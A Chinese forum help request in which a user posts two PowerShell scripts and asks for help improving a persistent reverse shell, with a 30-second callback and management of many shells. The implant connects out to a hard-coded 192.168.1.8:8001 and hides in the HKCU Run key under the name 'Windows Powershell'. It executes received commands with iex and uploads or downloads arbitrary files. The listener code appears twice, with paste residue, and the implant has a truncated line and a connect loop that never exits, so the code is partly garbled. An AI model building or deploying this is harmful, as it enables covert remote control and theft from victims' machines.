萌新求助,该怎么样写更好?谢谢大佬


Hwctak asked 3年 ago

需求是这样的。
1.一共两个ps1脚本
第一个 客户端:监听xxxx端口,服务端则反弹shell到客户端监听端口,然后客户端可以输出cmd,上传下载,等功能。

需求:
1.服务端每隔30秒反弹一次shell到客户端,如果服务端检测到当前与客户端是连接状态则不反弹,如果非连接状态则开始反弹。
2.客户端写一个列表功能,也就是可以支持对服务端反弹回来的多个shell进行批量管理。
萌新:如若有英雄帮忙一下,回头请留下联系方式,红包奉上!

# Operator-side listener (the post calls this script the "client").
# It binds a TCP port, accepts exactly one inbound connection and wraps it in
# line-oriented text reader/writer objects used by every function below.
$port=8001

# Create server
# IPAddress.Any binds the listener on every local interface, not only loopback.
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener($endpoint)
$listener.Start()
Write-Host 'Listening on port'$port'...'

# Wait for connection
# AcceptTcpClient() blocks until a peer connects; it is called once, so only a
# single session is handled. The raw NetworkStream is used directly: there is no
# TLS and no check of who connected, so the whole exchange is cleartext and
# unauthenticated on the wire.
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
# Prints "[*]" with a green asterisk followed by the status text.
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established !

# Reads the whole file at $filename into memory and returns it as a byte array.
# The path is used as given; ReadAllBytes throws if it cannot be opened.
Function GetBinaryContent($filename){
$file_binary_content = [System.IO.File]::ReadAllBytes($filename)
return $file_binary_content
}

# Menu action 1: prompts for one command line, sends it to the connected peer
# and prints the single line the peer sends back.
# Uses the script-scope $writer/$reader created after AcceptTcpClient().
Function ExecCmd(){
echo "Input Command:"
$cmd = Read-Host
# The command travels as one cleartext line over the TCP stream.
$writer.WriteLine($cmd)
$writer.Flush()
# Exactly one line is read back; ReadLine() blocks until the peer answers.
$output = $reader.ReadLine()
echo $output
}

# Menu action 2: sends a local file to the peer, then the destination path, and
# reports success when the byte count echoed back equals the local byte count.
# Uses the script-scope $writer/$reader.
Function Upload(){
echo "Input A Local File :"
$local_file = Read-Host
$local_binary_content = GetBinaryContent($local_file)
$local_binary_content_len = $local_binary_content.Length
# Casting a byte array to [string] joins the elements with $OFS (a space by
# default), so the file is sent as one line of space-separated decimal values.
$file_string_content = [string] $local_binary_content
$writer.WriteLine($file_string_content)
$writer.Flush()
echo "Input Destination :"
$dest_file = Read-Host
# The destination path is chosen on this side and sent verbatim to the peer.
$writer.WriteLine($dest_file)
$writer.Flush()
# The peer replies with the length of the file it wrote.
$new_file_len = $reader.ReadLine()
$success = "File Upload Successfully."
$failed = "File Upload Failed."
# Only the byte counts are compared; the content itself is not verified.
if($new_file_len -eq $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success
}
elseif($new_file_len -ne $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed
}

}

# Menu action 3: asks the peer for a file by path, rebuilds it from the reply
# line and writes it to a local file chosen at the prompt.
# Uses the script-scope $writer/$reader.
Function Download(){
echo "Input A Remote File:"
$remote_file = Read-Host
$writer.WriteLine($remote_file)
$writer.Flush()
# The reply is one line of space-separated values, one token per byte.
$remote_file_string_content = $reader.ReadLine()
$remote_file_string_content_split = $remote_file_string_content.Split(" ")
$remote_file_bianry_len = $remote_file_string_content_split.Count
$download_byte_array = New-Object Byte[] $remote_file_bianry_len
# Each token is converted to a byte on assignment; the data comes from the
# network and is not validated first.
# NOTE(review): a token that is not a number in 0..255 presumably raises a
# conversion error here - confirm.
for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){
$download_byte_array[$i] = $remote_file_string_content_split[$i]
}
echo "Input Local Filename :"
$local_filename = Read-Host
# Peer-supplied bytes are written to local disk under the chosen name.
[System.IO.File]::WriteAllBytes($local_filename, $download_byte_array)
# The file is read back and its length sent to the peer, which answers with a
# status line that is printed as-is.
$new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename)
$new_file_binary_len = $new_file_binary_content.Count
$writer.WriteLine($new_file_binary_len)
$writer.Flush()
$result = $reader.ReadLine()
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result
}

# Interactive menu loop. For choices 1-4 the choice itself is first sent to the
# peer as a one-character line (the protocol's message type), then the matching
# local handler runs. Any other input is ignored and the menu is shown again.
# The loop ends only on choice 4; no Close()/Stop() call on the stream, client
# or listener follows the loop in this listing.
while($true){
echo "[1] Exec Command."
echo "[2] Upload File."
echo "[3] Download File."
echo "[4] Exit."
echo "Input Command Type :"
$cmd_type = Read-Host
if($cmd_type -eq "1"){
$writer.WriteLine($cmd_type)
$writer.Flush()
ExecCmd
}
elseif($cmd_type -eq "2"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Upload
}
elseif($cmd_type -eq "3"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Download
}
elseif($cmd_type -eq "4"){
# The exit request is forwarded to the peer before leaving the loop.
$writer.WriteLine($cmd_type)
$writer.Flush()
break
}else{
continue
}
echo "========================================"
echo ""
}
# From here to the "第二个服务端" heading the page appears to repeat the listener
# listing above statement for statement; the "kk1" fused onto the next line
# looks like paste residue (the author's follow-up says the code was pasted
# incorrectly).
# Operator-side listener: binds a TCP port and accepts one inbound connection.
kk1$port=8001

# Create server
# IPAddress.Any binds the listener on every local interface.
$endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener($endpoint)
$listener.Start()
Write-Host 'Listening on port'$port'...'

# Wait for connection
# Blocks until a peer connects; the stream is used without TLS or any check of
# the peer's identity.
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
# Prints "[*]" with a green asterisk followed by the status text.
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established !

# Returns the full content of the file at $filename as a byte array.
Function GetBinaryContent($filename){
$file_binary_content = [System.IO.File]::ReadAllBytes($filename)
return $file_binary_content
}

# Menu action 1: sends one command line typed at the console to the peer and
# prints the one-line reply. Relies on the script-scope $writer/$reader.
Function ExecCmd(){
echo "Input Command:"
$cmd = Read-Host
# Sent as a single cleartext line.
$writer.WriteLine($cmd)
$writer.Flush()
# Blocks until the peer returns one line.
$output = $reader.ReadLine()
echo $output
}

# Menu action 2: sends a local file and a destination path to the peer, then
# compares the byte count the peer reports with the local byte count.
# Relies on the script-scope $writer/$reader.
Function Upload(){
echo "Input A Local File :"
$local_file = Read-Host
$local_binary_content = GetBinaryContent($local_file)
$local_binary_content_len = $local_binary_content.Length
# [string] on a byte array yields the values joined by $OFS (space by default),
# i.e. one line of decimal byte values.
$file_string_content = [string] $local_binary_content
$writer.WriteLine($file_string_content)
$writer.Flush()
echo "Input Destination :"
$dest_file = Read-Host
$writer.WriteLine($dest_file)
$writer.Flush()
# Length of the file as written by the peer.
$new_file_len = $reader.ReadLine()
$success = "File Upload Successfully."
$failed = "File Upload Failed."
# Length-only check; content is not compared.
if($new_file_len -eq $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success
}
elseif($new_file_len -ne $local_binary_content_len){
Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed
}

}

# Menu action 3: requests a file from the peer by path, decodes the reply line
# into bytes and writes them to a local file named at the prompt.
# Relies on the script-scope $writer/$reader.
Function Download(){
echo "Input A Remote File:"
$remote_file = Read-Host
$writer.WriteLine($remote_file)
$writer.Flush()
# Reply format: one line, space-separated, one token per byte.
$remote_file_string_content = $reader.ReadLine()
$remote_file_string_content_split = $remote_file_string_content.Split(" ")
$remote_file_bianry_len = $remote_file_string_content_split.Count
$download_byte_array = New-Object Byte[] $remote_file_bianry_len
# Tokens from the network are converted to bytes on assignment, unvalidated.
for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){
$download_byte_array[$i] = $remote_file_string_content_split[$i]
}
echo "Input Local Filename :"
$local_filename = Read-Host
# Writes the received bytes to disk, then reports the written length back and
# prints the peer's status line.
[System.IO.File]::WriteAllBytes($local_filename, $download_byte_array)
$new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename)
$new_file_binary_len = $new_file_binary_content.Count
$writer.WriteLine($new_file_binary_len)
$writer.Flush()
$result = $reader.ReadLine()
Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result
}

# Interactive menu loop: choices 1-4 are sent to the peer as a one-character
# message-type line before the matching handler runs; other input re-displays
# the menu. Choice 4 forwards the exit request and leaves the loop.
while($true){
echo "[1] Exec Command."
echo "[2] Upload File."
echo "[3] Download File."
echo "[4] Exit."
echo "Input Command Type :"
$cmd_type = Read-Host
if($cmd_type -eq "1"){
$writer.WriteLine($cmd_type)
$writer.Flush()
ExecCmd
}
elseif($cmd_type -eq "2"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Upload
}
elseif($cmd_type -eq "3"){
$writer.WriteLine($cmd_type)
$writer.Flush()
Download
}
elseif($cmd_type -eq "4"){
$writer.WriteLine($cmd_type)
$writer.Flush()
break
}else{
continue
}
echo "========================================"
echo ""
}
第二个服务端:
# Remote-side script (the post calls it the "server"): it dials out to the
# hard-coded address and port below rather than listening.
$address = '192.168.1.8'
$port = 8001
# Logon persistence (MITRE ATT&CK T1547.001): registers this script's own path
# under the current user's Run key, which Windows processes at each logon of
# that user. HKCU is writable without administrator rights.
# The value name "Windows Powershell" resembles a legitimate product name, so
# review of Run entries should look at the value data, not only the name.
# Observable as a registry value-set on
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run (e.g. Sysmon event ID 13).
 $autorunKeyName = "Windows Powershell"
$autorunKeyVal = $MyInvocation.MyCommand.Path
$autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
# Create the value when absent ...
if (-not $autoruns.$autorunKeyName) {
 New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
# ... or replace it when it points somewhere other than this script's path.
elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) {
 Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName
 New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
 # Main loop of the remote-side script: an outbound connection phase followed by
 # a command-dispatch phase driven entirely by lines read from the socket.
 # Network profile: PowerShell process opening a cleartext TCP connection to the
 # fixed $address:$port; no TLS and no authentication of the controlling peer
 # (ATT&CK T1059.001 for the interpreter use).
 while ($true) {
 do {
 try {
 # Connection attempt: the TcpClient constructor connects immediately and
 # throws on failure, which the catch below only reports to the console.
 Write-Host “Trying to reach “$address”:”$port
 $client = New-Object System.Net.Sockets.TcpClient($address, $port) 
 $stream = $client.GetStream()
 $writer = New-Object System.IO.StreamWriter($stream)
 # The next statement is truncated in the page as published.
 $write.
 $reader = New-Object System.IO.StreamReader($stream)
 Start-Sleep -s 10
 }
 catch {
 Write-Host "failed on tcp connect."
 }
 } while ($true)
 Write-Host "Connected"
 do{
 # First line of each exchange is the message type chosen by the peer.
 $cmd_type = $reader.ReadLine()
 echo $cmd_type
 if($cmd_type -eq "1"){
 echo "Command Type : Exec Command."
 $cmd = $reader.ReadLine()
 # iex (Invoke-Expression) evaluates the received line as PowerShell in this
 # user's context: the peer controls what runs. With Script Block Logging
 # enabled the evaluated text is recorded (event ID 4104).
 try{ $output = [string](iex $cmd) }
 catch{ $output = $_.Exception.Message }
 # Output (or the exception message) is flattened to one string and returned.
 $writer.WriteLine($output)
 $writer.Flush()
 }
 elseif($cmd_type -eq "2"){
 echo "Command Type : Upload File."
 # Incoming file: one line of space-separated values, one token per byte.
 $file_string_content = $reader.ReadLine()
 $file_string_content_split = $file_string_content.Split(" ")
 $file_string_content_split_len = $file_string_content_split.Count
 echo $file_string_content_split_len
 $byte_array = New-Object Byte[] $file_string_content_split_len
 for([int] $i = 0; $i -lt $file_string_content_split_len; $i++){
 $byte_array[$i] = $file_string_content_split[$i]
 }
 # Both the bytes and the destination path come from the peer, so this is a
 # write of peer-chosen content to a peer-chosen path, limited only by the
 # running user's file permissions.
 $dest_file = $reader.ReadLine()
 [System.IO.File]::WriteAllBytes($dest_file, $byte_array)
 # The written file is read back and its length reported to the peer.
 $new_file_content = [System.IO.File]::ReadAllBytes($dest_file)
 $new_file_content_len = $new_file_content.Length
 $writer.WriteLine($new_file_content_len)
 $writer.Flush()
 }
 elseif($cmd_type -eq "3"){
 echo "Command Type : Download File."
 # The peer names any path; its full content is read and sent back as
 # space-separated byte values, i.e. a read of any file this user can open.
 $local_file = $reader.ReadLine()
 $local_binary_content = [System.IO.File]::ReadAllBytes($local_file)
 $local_string_content = [string]$local_binary_content
 $writer.WriteLine($local_string_content)
 $writer.Flush()
 # The peer reports how many bytes it stored; only the counts are compared.
 $remote_file_len = $reader.ReadLine()
 $local_file_len = $local_binary_content.Count
 if($remote_file_len -eq $local_file_len){
 $writer.WriteLine("Download Successfully.")
 $writer.Flush()
 }
 elseif($remote_file_len -ne $local_file_len){
 $writer.WriteLine("Download Failed.")
 $writer.Flush()
 }
 }
 elseif($cmd_type -eq "4"){
 # Exit request: close the connection objects and terminate the script.
 Write-Host "Exiting"
 $writer.Close()
 $reader.Close()
 $stream.Close()
 $client.Close()
 exit
 break
 }
 else{
 # Unknown message types are ignored.
 continue
 }
 }while($true)
 # Clean up
 $writer.Close()
 $reader.Close()
 $stream.Close()
 $client.Close()
}
Hwctak replied 3年 ago

抱歉,暂时不了解这个编辑器的功能,代码贴错误了。抱歉!